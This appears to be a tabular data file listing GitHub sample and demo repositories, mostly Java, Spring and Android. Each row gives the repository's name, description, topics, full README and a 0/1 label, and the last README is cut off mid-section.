full_name
stringlengths
7
104
description
stringlengths
4
725
topics
stringlengths
3
468
readme
stringlengths
13
565k
label
int64
0
1
hantsy/spring4-sandbox
Sample code demonstrating new features of Spring 4.x
null
spring4-sandbox =============== Sample code demonstrating new features of Spring 4.x. Please read the [wiki](https://github.com/hantsy/spring4-sandbox/wiki) for more details.
1
xtremebiker/jsf-spring-boot
JSF 2.3 + Spring Boot 2 sample application
null
# jsf-spring-boot JSF 2.3 + Spring Boot 2 sample application ## Instructions Build it with Maven and run the war as if it were a standard jar: `java -jar target/jsf-spring-boot-1.0.0.war` It will launch a JSF- and Spring-powered website that you can access at http://localhost:8080/ui/hello.xhtml
1
ThomasVitale/developer-experience-java-kubernetes
Samples showing how to use different tools and patterns to improve the developer experience and optimise the inner development loop.
buildpacks cartographer cartographers carvel cloud-native java knative kubernetes paketo-buildpack skaffold telepresence tilt
# Developer Experience with Java on Kubernetes In the cloud-native world, being a developer might be challenging. The number of technologies and patterns to know can be overwhelming. This repository presents an approach based on open-source technologies and focused on improving the inner development loop and continuous delivery on Kubernetes. The end goal is delivering value continuously, quickly, and reliably. The approach works with any Java application, but we'll use Spring Boot for our examples. Some of the open-source technologies covered are: * Cloud Native Buildpacks * Knative * Tilt * Skaffold * Telepresence * Argo CD * Cartographer. For each tool/strategy there is a dedicated folder within which you'll find instructions on how to set up your environment. ## Pre-requisites Running through the examples will require you to have the following installed on your machine: * [Java 21](https://adoptium.net/en-GB/temurin/releases) * [Docker](https://www.docker.com) * [kubectl](https://kubectl.docs.kubernetes.io) * [kind](https://kind.sigs.k8s.io/docs/user/quick-start/#installation) * [kapp](https://carvel.dev/kapp/docs/latest/install) To manage different versions and distributions of Java, I recommend using [SDKMAN!](https://sdkman.io). Finally, to interact with HTTP services, I recommend using [httpie](https://httpie.io).
0
auth0-samples/auth0-spring-security5-api-sample
Sample demonstrating how to secure your API using Spring Boot 2 and Spring Security 5
dx-sdk-quickstart quickstart
# Auth0 Spring Security API Samples [![CircleCI](https://circleci.com/gh/auth0-samples/auth0-spring-security5-api-sample.svg?style=svg)](https://circleci.com/gh/auth0-samples/auth0-spring-security5-api-sample) These samples demonstrate how to create an API with Spring Boot and the [Okta Spring Boot Starter](https://github.com/okta/okta-spring-boot). These samples do not demonstrate how to sign a JWT but rather assume that a user has already been authenticated by Auth0 and holds an access token for API access. For information on how to use Auth0 to authenticate users, see [the docs](https://auth0.com/docs). ## What is Auth0? Auth0 helps you to: * Add authentication with [multiple authentication sources](https://docs.auth0.com/identityproviders), either social like **Google, Facebook, Microsoft Account, LinkedIn, GitHub, Twitter, Box, Salesforce, among others**, or enterprise identity systems like **Windows Azure AD, Google Apps, Active Directory, ADFS or any SAML Identity Provider**. * Add authentication through more traditional **[username/password databases](https://docs.auth0.com/mysql-connection-tutorial)**. * Add support for **[linking different user accounts](https://docs.auth0.com/link-accounts)** with the same user. * Support for generating signed [JSON Web Tokens](https://docs.auth0.com/jwt) to call your APIs and **flow the user identity** securely. * Analytics of how, when and where users are logging in. * Pull data from other sources and add it to the user profile, through [JavaScript rules](https://docs.auth0.com/rules). ## Create a free Auth0 account 1. Go to [Auth0](https://auth0.com/signup) and click Sign Up. 2. Use Google, GitHub or Microsoft Account to login. ## Issue Reporting If you have found a bug or if you have a feature request, please report them in this repository's issues section. Please do not report security vulnerabilities on the public GitHub issue tracker.
The [Responsible Disclosure Program](https://auth0.com/whitehat) details the procedure for disclosing security issues. ## Author [Auth0](https://auth0.com) ## License This project is licensed under the MIT license. See the [LICENSE](LICENSE) file for more info.
1
friyiajr/BLESampleExpo
A Sample of BLE in Expo to Accompany my YouTube Video
null
null
1
RawSanj/spring-tiles-sample-app
Spring MVC - Apache Tiles - AdminLTE Bootstrap template - Sample Application
adminlte apache-tiles docker spring-data-jpa spring-mvc spring-security spring-tiles-sample twitter-bootstrap
# Spring-Tiles-AdminLTE-Demo-App ### Spring MVC - Spring Data JPA - Spring Security - AdminLTE Bootstrap template - Apache Tiles - Sample Application This is a demo of how to integrate Spring MVC with Apache Tiles and AdminLTE (a Bootstrap 3 based Admin Panel template). - Spring - Apache Tiles - AdminLTE - A Bootstrap template ### Tech Spring-Tiles-Sample-App uses a number of open source projects: * [Spring Framework] - Core support for dependency injection, transaction management, web applications, data access, messaging, testing and more. * [Spring Data JPA] - Spring Data JPA, part of the larger Spring Data family, makes it easy to implement JPA based repositories. * [Spring Security] - Spring Security is a powerful and highly customizable authentication and access-control framework. * [Apache Tiles] - A free, open-source templating framework for modern Java applications. * [AdminLTE] - Free Premium Admin control Panel Theme based On Bootstrap 3. * [Twitter Bootstrap] - Great UI boilerplate for modern web apps. * [jQuery] - jQuery is a fast, small, and feature-rich JavaScript library. ### Installation ```sh $ git clone https://github.com/RawSanj/spring-tiles-sample-app.git ``` Run this application using the embedded Jetty server and HSQL in-memory DB server: ```sh mvn -P dev jetty:run -Dspring.profiles.active="dev" ``` Or run this application using the embedded Tomcat7 server (or Jetty) and a PostgreSQL DB server: ```sh mvn -P dev tomcat7:run -Dspring.profiles.active="prod" ``` ### Run in Docker #### Run locally: Build the WAR file: ```sh $ mvn package ``` Build the docker image: ```sh $ docker build . -t spring-tiles-sample-app ``` Run the docker image: ```sh $ docker run -d -p 8080:8080 spring-tiles-sample-app ``` #### Run on Cloud: Try http://play-with-docker.com for running Docker in the browser without any local setup.
Pull the docker image: ```sh $ docker pull rawsanj/spring-tiles-sample-app ``` Run the docker image: ```sh $ docker run -d -p 8080:8080 rawsanj/spring-tiles-sample-app ``` ### Tools The following tools were used to create this project: * Spring Tool Suite * Maven * Google Chrome * Git License ---- The MIT License (MIT) Copyright (c) 2015 Sanjay Rawat [//]: # [Spring Framework]: <http://projects.spring.io/spring-framework/> [Apache Tiles]: <https://tiles.apache.org/> [Spring Data JPA]: <http://projects.spring.io/spring-data-jpa/> [Spring Security]: <http://projects.spring.io/spring-security/> [AdminLTE]: <https://github.com/almasaeed2010/AdminLTE> [Twitter Bootstrap]: <http://twitter.github.com/bootstrap/> [jQuery]: <http://jquery.com>
1
guigarage/mastering-javafx-controls
This repository contains all samples of the "Mastering JavaFX 8 Controls" book. You can find more information about the book at http://www.guigarage.com/javafx-book/
null
mastering-javafx-controls ========================= This repository contains all samples of the "Mastering JavaFX 8 Controls" book. You can find more information about the book at http://www.guigarage.com/javafx-book/
0
berndruecker/flowing-retail
Sample application demonstrating an order fulfillment system decomposed into multiple independent components (e.g. microservices). Showing concrete implementation alternatives using e.g. Java, Spring Boot, Apache Kafka, Camunda, Zeebe, ...
null
# Flowing Retail This sample application demonstrates a simple order fulfillment system, decomposed into multiple independent components (like _microservices_). The repository contains code for multiple implementation alternatives to allow a broad audience to understand the code and to compare alternatives. The [table below](#alternatives) lists these alternatives. The example respects learnings from **Domain Driven Design (DDD)**, Event Driven Architecture (EDA) and **Microservices (µS)** and is designed to give you hands-on access to these topics. **Note:** The code was written in order to be explained. Hence, I favored simplified code or copy & paste over production-ready code with generic solutions. **Don't consider the coding style best practice! It is purpose-written to be easily explainable code**. You can find more information on the concepts in the [Practical Process Automation](https://processautomationbook.com/) book with O'Reilly. Flowing Retail simulates a simple order fulfillment system: ![Events and Commands](docs/workflow-in-service.png) <a name = "alternatives"></a> ## Architecture and implementation alternatives The most fundamental choice is to select the **communication mechanism**: * **[Apache Kafka](kafka/)** as event bus (could be easily changed to messaging, e.g. RabbitMQ): ![Architecture](docs/architecture.png) * **[REST](rest/)** communication between services. * This example also shows how to do **stateful resilience patterns** like **stateful retries** leveraging a workflow engine. * **[Zeebe](zeebe/)** broker doing work distribution. After the communication mechanism, the next choice is the **workflow engine**: * **Camunda 8 (aka Zeebe)** and the **programming language**: * **Java** ## Storyline Flowing Retail simulates a simple order fulfillment system. The business logic is separated into the services shown above (shown as a [context map](https://www.infoq.com/articles/ddd-contextmapping)).
### Long running services and orchestration Some services are **long running** in nature - for example: the payment service asks customers to update expired credit cards. A workflow engine is used to persist and control these long running interactions. ### Workflows live within service boundaries Note that the state machine (_or workflow engine in this case_) is a library used **within** one service. If different services need a workflow engine they can run whatever engine they want. This way it is an autonomous team decision if they want to use a framework, and which one: ![Events and Commands](docs/workflow-in-service.png) ## Links and background reading * [Practical Process Automation](https://processautomationbook.com/) book * Introduction blog post: https://blog.bernd-ruecker.com/flowing-retail-demonstrating-aspects-of-microservices-events-and-their-flow-with-concrete-source-7f3abdd40e53 * InfoQ-Writeup "Events, Flows and Long-Running Services: A Modern Approach to Workflow Automation": https://www.infoq.com/articles/events-workflow-automation
1
firatkucuk/diffie-hellman-helloworld
Sample "Diffie-Hellman Key Exchange" usage in Java
null
This little Diffie-Hellman Key Exchange program was implemented for learning purposes. This is how things are done in Main.java: ```java // 1. ------------------------------------------------------------------ // This is Alice and Bob // Alice and Bob want to chat securely. But how? final Person alice = new Person(); final Person bob = new Person(); // ? ? // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // 2. ------------------------------------------------------------------ // Alice and Bob generate public and private keys. alice.generateKeys(); bob.generateKeys(); // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // _ PUBLIC KEY _ PUBLIC KEY // _ PRIVATE KEY _ PRIVATE KEY // 3. ------------------------------------------------------------------ // Alice and Bob exchange public keys with each other. alice.receivePublicKeyFrom(bob); bob.receivePublicKeyFrom(alice); // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // _ PUBLIC KEY <-------------------------> _ PUBLIC KEY // 4. ------------------------------------------------------------------ // Alice generates the common secret key using her private key and Bob's public key. // Bob generates the common secret key using his private key and Alice's public key. // Both secret keys are equal without ever being TRANSFERRED. This is the magic of the Diffie-Hellman algorithm. alice.generateCommonSecretKey(); bob.generateCommonSecretKey(); // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // + public key + public key // _ SECRET KEY _ SECRET KEY // 5. ------------------------------------------------------------------ // Alice encrypts a message using the secret key and sends it to Bob alice.encryptAndSendMessage("Bob! 
Guess Who I am.", bob); // // O O // /|\ []--------------------------------> /|\ // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // + public key + public key // + secret key + secret key // + message _ MESSAGE // 6. ------------------------------------------------------------------ // Bob receives the important message and decrypts with secret key. bob.whisperTheSecretMessage(); // // O ((( ((( ((( \O/ ))) // /|\ | // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // + public key + public key // + secret key + secret key // + message + message ```
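The flow sketched above with the `Person` class can also be run directly against the JDK's standard `javax.crypto` API. A minimal, self-contained sketch (the class name `DhSketch` is illustrative; this is independent of the repo's own `Person` implementation, whose internals aren't shown here):

```java
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.util.Arrays;
import javax.crypto.KeyAgreement;

// Diffie-Hellman key agreement using only the JDK (javax.crypto),
// mirroring steps 2-4 above. Illustrative sketch, not the repo's code.
public class DhSketch {

    static boolean secretsMatch() throws Exception {
        // Step 2: each party generates a DH key pair.
        // 512 bits keeps this demo fast; use 2048+ in practice.
        KeyPairGenerator gen = KeyPairGenerator.getInstance("DH");
        gen.initialize(512);
        KeyPair alice = gen.generateKeyPair();
        KeyPair bob = gen.generateKeyPair();

        // Steps 3-4: each side combines its own private key
        // with the other party's public key.
        KeyAgreement aliceAgree = KeyAgreement.getInstance("DH");
        aliceAgree.init(alice.getPrivate());
        aliceAgree.doPhase(bob.getPublic(), true);
        byte[] aliceSecret = aliceAgree.generateSecret();

        KeyAgreement bobAgree = KeyAgreement.getInstance("DH");
        bobAgree.init(bob.getPrivate());
        bobAgree.doPhase(alice.getPublic(), true);
        byte[] bobSecret = bobAgree.generateSecret();

        // Both sides derive the same secret, which was never transmitted.
        return Arrays.equals(aliceSecret, bobSecret);
    }

    public static void main(String[] args) throws Exception {
        System.out.println(secretsMatch());
    }
}
```

Running `main` prints `true`: the two independently derived secrets are byte-for-byte identical.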
1
isuperqiang/ExpandableListViewDemo
ExpandableListView usage (a simple sample of ExpandableListView)
null
# ExpandableListViewDemo This project is a short summary of how to use ExpandableListView, covering the API and a few small tips. **Key points:** * Supports collapsing the other groups when one group is tapped; by default each group expands and collapses independently of the others; * Supports custom indicators for group expand/collapse, which look quite nice; * The simple adapter provided by the system has complicated parameters and is inconvenient to use; defining your own adapter is recommended;
1
ncbo/ncbo_rest_sample_code
Sample code that demonstrates the use of the NCBO REST services
null
# NCBO REST Sample Code Sample code that demonstrates the use of the NCBO REST services. Documentation for REST services is available at [http://data.bioontology.org/documentation](http://data.bioontology.org/documentation) Questions and bug reports can be directed to the NCBO Support List: [support@bioontology.org](mailto:support@bioontology.org) ## Community Code Examples - [RNCBO](https://github.com/muntisa/RNCBO) (uses R) - Cristian R. Munteanu (BiGCaT - [www.enanomapper.net](http://www.enanomapper.net))
1
odrotbohm/whoops-architecture
Sample code for my talk "Whoops! Where did my architecture go?"
null
null
1
jhipster/jhipster-sample-app-vuejs
This is a sample application created with JHipster, with the Vue.js blueprint
null
# jhipsterSampleApplicationVue This application was generated using JHipster 8.3.0; you can find documentation and help at [https://www.jhipster.tech/documentation-archive/v8.3.0](https://www.jhipster.tech/documentation-archive/v8.3.0). ## Project Structure Node is required for generation and recommended for development. `package.json` is always generated for a better development experience with prettier, commit hooks, scripts and so on. In the project root, JHipster generates configuration files for tools like git, prettier, eslint, husky, and others that are well known and you can find references on the web. `/src/*` structure follows default Java structure. - `.yo-rc.json` - Yeoman configuration file JHipster configuration is stored in this file at `generator-jhipster` key. You may find `generator-jhipster-*` for specific blueprints configuration. - `.yo-resolve` (optional) - Yeoman conflict resolver Allows using a specific action when conflicts are found, skipping prompts for files that match a pattern. Each line should match `[pattern] [action]` with pattern being a [Minimatch](https://github.com/isaacs/minimatch#minimatch) pattern and action being one of skip (default if omitted) or force. Lines starting with `#` are considered comments and are ignored. - `.jhipster/*.json` - JHipster entity configuration files - `npmw` - wrapper to use locally installed npm. JHipster installs Node and npm locally using the build tool by default. This wrapper makes sure npm is installed locally and uses it, avoiding differences that different versions can cause. By using `./npmw` instead of the traditional `npm` you can configure a Node-less environment to develop or test your application. - `/src/main/docker` - Docker configurations for the application and services that the application depends on ## Development Before you can build this project, you must install and configure the following dependencies on your machine: 1.
[Node.js](https://nodejs.org/): We use Node to run a development web server and build the project. Depending on your system, you can install Node either from source or as a pre-packaged bundle. After installing Node, you should be able to run the following command to install development tools. You will only need to run this command when dependencies change in [package.json](package.json). ``` npm install ``` We use npm scripts and [Webpack][] as our build system. Run the following commands in two separate terminals to create a blissful development experience where your browser auto-refreshes when files change on your hard drive. ``` ./mvnw npm start ``` Npm is also used to manage CSS and JavaScript dependencies used in this application. You can upgrade dependencies by specifying a newer version in [package.json](package.json). You can also run `npm update` and `npm install` to manage dependencies. Add the `help` flag on any command to see how you can use it. For example, `npm help update`. The `npm run` command will list all of the scripts available to run for this project. ### PWA Support JHipster ships with PWA (Progressive Web App) support, and it's turned off by default. One of the main components of a PWA is a service worker. The service worker initialization code is commented out by default. To enable it, uncomment the following code in `src/main/webapp/index.html`: ```html <script> if ('serviceWorker' in navigator) { navigator.serviceWorker.register('./service-worker.js').then(function () { console.log('Service Worker Registered'); }); } </script> ``` Note: [Workbox](https://developers.google.com/web/tools/workbox/) powers JHipster's service worker. It dynamically generates the `service-worker.js` file. 
### Managing dependencies For example, to add the [Leaflet][] library as a runtime dependency of your application, you would run the following command: ``` npm install --save --save-exact leaflet ``` To benefit from TypeScript type definitions from the [DefinitelyTyped][] repository in development, you would run the following command: ``` npm install --save-dev --save-exact @types/leaflet ``` Then you would import the JS and CSS files specified in the library's installation instructions so that [Webpack][] knows about them. Note: There are still a few other things remaining to do for Leaflet that we won't detail here. For further instructions on how to develop with JHipster, have a look at [Using JHipster in development][]. ## Building for production ### Packaging as jar To build the final jar and optimize the jhipsterSampleApplicationVue application for production, run: ``` ./mvnw -Pprod clean verify ``` This will concatenate and minify the client CSS and JavaScript files. It will also modify `index.html` so it references these new files. To ensure everything worked, run: ``` java -jar target/*.jar ``` Then navigate to [http://localhost:8080](http://localhost:8080) in your browser. Refer to [Using JHipster in production][] for more details. ### Packaging as war To package your application as a war in order to deploy it to an application server, run: ``` ./mvnw -Pprod,war clean verify ``` ### JHipster Control Center JHipster Control Center can help you manage and control your application(s). You can start a local control center server (accessible on http://localhost:7419) with: ``` docker compose -f src/main/docker/jhipster-control-center.yml up ``` ## Testing ### Client tests Unit tests are run by [Jest][]. They're located in [src/test/javascript/](src/test/javascript/) and can be run with: ``` npm test ``` UI end-to-end tests are powered by [Cypress][].
They're located in [src/test/javascript/cypress](src/test/javascript/cypress) and can be run by starting Spring Boot in one terminal (`./mvnw spring-boot:run`) and running the tests (`npm run e2e`) in a second one. #### Lighthouse audits You can execute automated [lighthouse audits](https://developers.google.com/web/tools/lighthouse/) with [cypress audits](https://github.com/mfrachet/cypress-audit) by running `npm run e2e:cypress:audits`. You should only run the audits when your application is packaged with the production profile. The lighthouse report is created in `target/cypress/lhreport.html`. ### Spring Boot tests To launch your application's tests, run: ``` ./mvnw verify ``` ### Gatling Performance tests are run by [Gatling][] and written in Scala. They're located in [src/test/java/gatling/simulations](src/test/java/gatling/simulations). You can execute all Gatling tests with ``` ./mvnw gatling:test ``` ## Others ### Code quality using Sonar Sonar is used to analyse code quality. You can start a local Sonar server (accessible on http://localhost:9001) with: ``` docker compose -f src/main/docker/sonar.yml up -d ``` Note: we have turned off the forced authentication redirect for the UI in [src/main/docker/sonar.yml](src/main/docker/sonar.yml) for an out-of-the-box experience while trying out SonarQube; for real use cases turn it back on. You can run a Sonar analysis using the [sonar-scanner](https://docs.sonarqube.org/display/SCAN/Analyzing+with+SonarQube+Scanner) or the maven plugin. Then, run a Sonar analysis: ``` ./mvnw -Pprod clean verify sonar:sonar -Dsonar.login=admin -Dsonar.password=admin ``` If you need to re-run the Sonar phase, please be sure to specify at least the `initialize` phase since Sonar properties are loaded from the sonar-project.properties file.
``` ./mvnw initialize sonar:sonar -Dsonar.login=admin -Dsonar.password=admin ``` Additionally, instead of passing `sonar.password` and `sonar.login` as CLI arguments, these parameters can be configured from [sonar-project.properties](sonar-project.properties) as shown below: ``` sonar.login=admin sonar.password=admin ``` For more information, refer to the [Code quality page][]. ### Using Docker to simplify development (optional) You can use Docker to improve your JHipster development experience. A number of docker-compose configurations are available in the [src/main/docker](src/main/docker) folder to launch required third party services. For example, to start a MySQL database in a docker container, run: ``` docker compose -f src/main/docker/mysql.yml up -d ``` To stop it and remove the container, run: ``` docker compose -f src/main/docker/mysql.yml down ``` You can also fully dockerize your application and all the services that it depends on. To achieve this, first build a docker image of your app by running: ``` npm run java:docker ``` Or build an arm64 docker image when using an arm64 processor OS, like macOS on the M1 processor family, by running: ``` npm run java:docker:arm64 ``` Then run: ``` docker compose -f src/main/docker/app.yml up -d ``` When running Docker Desktop on macOS Big Sur or later, consider enabling the experimental `Use the new Virtualization framework` setting for better processing performance ([disk access performance is worse](https://github.com/docker/roadmap/issues/7)). For more information refer to [Using Docker and Docker-Compose][]; this page also contains information on the docker-compose sub-generator (`jhipster docker-compose`), which is able to generate docker configurations for one or several JHipster applications. ## Continuous Integration (optional) To configure CI for your project, run the ci-cd sub-generator (`jhipster ci-cd`); this will let you generate configuration files for a number of Continuous Integration systems.
Consult the [Setting up Continuous Integration][] page for more information. [JHipster Homepage and latest documentation]: https://www.jhipster.tech [JHipster 8.3.0 archive]: https://www.jhipster.tech/documentation-archive/v8.3.0 [Using JHipster in development]: https://www.jhipster.tech/documentation-archive/v8.3.0/development/ [Using Docker and Docker-Compose]: https://www.jhipster.tech/documentation-archive/v8.3.0/docker-compose [Using JHipster in production]: https://www.jhipster.tech/documentation-archive/v8.3.0/production/ [Running tests page]: https://www.jhipster.tech/documentation-archive/v8.3.0/running-tests/ [Code quality page]: https://www.jhipster.tech/documentation-archive/v8.3.0/code-quality/ [Setting up Continuous Integration]: https://www.jhipster.tech/documentation-archive/v8.3.0/setting-up-ci/ [Node.js]: https://nodejs.org/ [NPM]: https://www.npmjs.com/ [Webpack]: https://webpack.github.io/ [BrowserSync]: https://www.browsersync.io/ [Jest]: https://facebook.github.io/jest/ [Cypress]: https://www.cypress.io/ [Leaflet]: https://leafletjs.com/ [DefinitelyTyped]: https://definitelytyped.org/ [Gatling]: https://gatling.io/
1
michaljemala/spring-captcha
Spring Security SimpleCaptcha integration sample
null
Spring Captcha ============== Spring Security SimpleCaptcha integration sample. It demonstrates how to introduce CAPTCHA verification into form logins. After 3 unsuccessful login attempts, a CAPTCHA must be provided. CAPTCHAs are generated with the [SimpleCaptcha library](http://simplecaptcha.sourceforge.net/). How to install SimpleCaptcha to your local Maven repo ----------------------------------------------------- ```shell mvn install:install-file -Dfile=./lib/simplecaptcha-1.2.jar -DgroupId=nl.captcha -DartifactId=simplecaptcha -Dversion=1.2 -Dpackaging=jar ```
1
yongjhih/dagger2-sample
CoffeeMaker Sample
null
# CoffeeMaker Dagger2-Sample [![Build Status](https://travis-ci.org/yongjhih/dagger2-sample.svg)](https://travis-ci.org/yongjhih/dagger2-sample) ## Usage ```bash ./gradlew execute ``` ## Getting Started Main: [examples/simple/src/main/java/coffee/CoffeeApp.java](examples/simple/src/main/java/coffee/CoffeeApp.java) ```java Coffee coffee = DaggerCoffeeApp_Coffee.builder().build(); coffee.maker().brew(); ``` ``` $ ./gradlew execute ~ ~ ~ heating ~ ~ ~ => => pumping => => [_]P coffee! [_]P ``` ## See Also * Official Dagger Documentation: http://google.github.io/dagger/
1
gonzalonm/RoomDemo
Sample application using Room Persistence Library
android-application persistence sqlite
# RoomDemo Sample application using Room Persistence Library based on the following post: https://medium.com/@lalosoft/getting-started-with-room-persistence-library-8932276b4d8c ### Screenshot ![Alt text](https://github.com/gonzalonm/RoomDemo/blob/master/home.png?raw=true "Optional Title")
1
bharathish-diggavi/selenium-testng-framework
A sample framework based on the Page Object Model, Selenium, and TestNG, using Java.
automation-testing java page-object-framework page-object-model selenium selenium-automation selenium-java selenium-testng-framework testng web-auto
selenium-testng-framework --- --- A sample framework based on the Page Object Model, Selenium, and TestNG, using Java. This framework is based on the **Page Object Model (POM).** The framework uses: 1. Java 2. Selenium 3. TestNG 4. ExtentReport 5. Log4j 6. SimpleJavaMail Steps to create test cases: ---- Let's say we want to automate a Google search test. 1. Create GoogleSearchPage in the **pages** package. A page class should typically contain all the elements that are present on the page and the corresponding action methods. ``` public class GooglePage extends BasePage { @FindBy(name = "q") private WebElement searchinput; public GooglePage(WebDriver driver) { super(driver); } public void searchText(String key) { searchinput.sendKeys(key + Keys.ENTER); } } ``` 2. Create the test class, which calls the methods of GoogleSearchPage ``` @Test(testName = "Google search test", description = "Test description") public class GoogleSearchTest extends BaseTest { @Test public void googleSearchTest() { driver.get("https://www.google.co.in/"); GooglePage googlePage = PageinstancesFactory.getInstance(GooglePage.class); googlePage.searchText("abc"); Assert.assertTrue(driver.getTitle().contains("abc"), "Title doesn't contain abc : Test Failed"); } } ``` 3. Add the test class to the testng.xml file under the folder `src/test/resources/suites/` ``` <suite name="Suite"> <listeners></listeners> <test thread-count="5" name="Test" parallel="classes"> <classes> <class name="example.example.tests.GoogleSearchTest" /> ``` 4. Execute the test cases with the maven command `mvn clean test` --- Reporting --- The framework produces reports in three ways: 1. Log - in the file `logfile.log`. 2. An HTML report - generated using ExtentReports, under the folder `ExtentReports`. 3. A mail report - for which the toggle `mail.sendmail` in `test.properties` should be set to `true`, and all the properties such as `smtp host, port, proxy details, etc.,` should be provided correctly. --- Key Points: --- 1.
The class `WebDriverContext` is responsible for maintaining the same WebDriver instance throughout the test. So whenever you require the WebDriver instance being used for the current test (in the current thread), always call `WebDriverContext.getDriver()`. 2. Always use `PageinstancesFactory.getInstance(type)` to get the instance of a particular Page Object. (Of course you can use `new`, but it's better to use a single approach across the framework.) --- >For any query or suggestions please comment or mail @ diggavibharathish@gmail.com
1
i-tanaka730/design_pattern
Design pattern sample program
null
# design_pattern ## Overview This is a sample program of design patterns. ## Requirement - Java ## Thanks This program is a modification of the program created by Hiroshi Yuki. Thank you for the great program. I learned a great deal from it. ## License (Hiroshi Yuki) Copyright (C) 2001,2004 Hiroshi Yuki. http://www.hyuki.com/dp/ hyuki@hyuki.com This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. ## License (Ikuya Tanaka) [MIT](https://github.com/i-tanaka730/design_pattern/blob/master/LICENSE) ## Author [Ikuya Tanaka](https://github.com/i-tanaka730)
1
confluentinc/training-ksql-and-streams-src
Sample solutions for the exercises of the course KSQL & Kafka Streams
null
null
1
tunjos/RxJava2-RxMarbles-Samples
RxJava 2 RxMarbles Samples
example examples java learning-rxjava rxjava rxjava2 sample samples tutorial tutorials
RxJava 2 RxMarbles Samples ============== This repository contains RxJava 2 implementations of the sample operators found in the [RxMarbles Android Application](https://play.google.com/store/apps/details?id=com.moonfleet.rxmarbles). Please download the app for a more interactive tutorial. ### Running Simply import the project using IntelliJ IDEA and run the corresponding run configurations. ### Awesome Links [RxMarbles Android Application](https://play.google.com/store/apps/details?id=com.moonfleet.rxmarbles) [ReactiveX](http://reactivex.io/) [ReactiveX Operators](http://reactivex.io/documentation/operators.html) [RxMarbles](http://rxmarbles.com/) [RxJava Wiki](https://github.com/ReactiveX/RxJava/wiki) ### Dependencies [RxJava2](https://github.com/ReactiveX/RxJava) [RxJava2Extensions](https://github.com/akarnokd/RxJava2Extensions) ## [Transforming](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Transforming/src/Main.java) <img src="Transforming/operators/map.png" width="250"> <img src="Transforming/operators/flatMap.png" width="250"> <img src="Transforming/operators/buffer.png" width="250"> <img src="Transforming/operators/groupBy.png" width="250"> <img src="Transforming/operators/scan.png" width="250"> ## [Filtering](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Filtering/src/Main.java) <img src="Filtering/operators/debounce.png" width="250"> <img src="Filtering/operators/distinct.png" width="250"> <img src="Filtering/operators/distinctUntilChanged.png" width="250"> <img src="Filtering/operators/elementAt.png" width="250"> <img src="Filtering/operators/filter.png" width="250"> <img src="Filtering/operators/first.png" width="250"> <img src="Filtering/operators/last.png" width="250"> <img src="Filtering/operators/skip.png" width="250"> <img src="Filtering/operators/skipLast.png" width="250"> <img src="Filtering/operators/take.png" width="250"> <img src="Filtering/operators/takeLast.png" width="250"> <img 
src="Filtering/operators/ignoreElements.png" width="250"> ## [Combining](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Combining/src/Main.java) <img src="Combining/operators/startWith.png" width="250"> <img src="Combining/operators/amb.png" width="250"> <img src="Combining/operators/combineLatest.png" width="250"> <img src="Combining/operators/concat.png" width="250"> <img src="Combining/operators/merge.png" width="250"> <img src="Combining/operators/sequenceEqual.png" width="250"> <img src="Combining/operators/zip.png" width="250"> ## [Error Handling](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/ErrorHandling/src/Main.java) <img src="ErrorHandling/operators/onErrorReturn.png" width="250"> <img src="ErrorHandling/operators/onErrorResumeNext.png" width="250"> ## [Conditional](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Conditional/src/Main.java) <img src="Conditional/operators/all.png" width="250"> <img src="Conditional/operators/contains.png" width="250"> <img src="Conditional/operators/skipWhile.png" width="250"> <img src="Conditional/operators/skipUntil.png" width="250"> <img src="Conditional/operators/takeWhile.png" width="250"> <img src="Conditional/operators/takeUntil.png" width="250"> ## [Math](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Math/src/Main.java) <img src="Math/operators/average.png" width="250"> <img src="Math/operators/sum.png" width="250"> <img src="Math/operators/reduce.png" width="250"> <img src="Math/operators/count.png" width="250"> NB -------- All screenshots taken directly from the [RxMarbles Android Application](https://play.google.com/store/apps/details?id=com.moonfleet.rxmarbles). License -------- Copyright 2017 Tunji Olu-Taiwo Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. 
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
jeffreyscarpenter/reservation-service
Sample microservice implementation based on reservation data model from Cassandra: The Definitive Guide, 2nd/3rd Ed
null
# reservation-service

This repository provides a sample microservice implementation based on the reservation data model from the O'Reilly book [Cassandra: The Definitive Guide, 3rd Edition](https://www.amazon.com/Cassandra-Definitive-Guide-Distributed-Scale/dp/1098115163)

![Book Cover](images/cassandra-tdg.jpg)

See especially Chapter 7: "Designing Applications with Cassandra", which describes the design of the service, and Chapter 8: "Application Development with Drivers", which covers the implementation.

## Overview

The goal of this project is to provide a minimally functional implementation of a microservice that uses Apache Cassandra for its data storage via the DataStax Java Driver. The Reservation Service is implemented as a RESTful service using Spring Boot and exposes its API via Swagger.

![Reservation Service Design](images/reservation-service.png)

This service leverages the [reservation schema][schema] developed in the book, based on the data model shown here:

![Reservation Schema](images/cass_05_reservation_physical.png)

If you'd like to understand more about the motivation behind this design, you can access the data modeling chapter from the book for free at the [O'Reilly website][chapter].

## Requirements

This service runs on Java 11 or [12](https://jdk.java.net/12/) and uses the [DataStax Java Driver][driver].

## <a name="runservice">Running the Reservation Service</a>

The Reservation Service requires a Cassandra cluster consisting of at least one node. Here are some different options for running the Reservation Service:

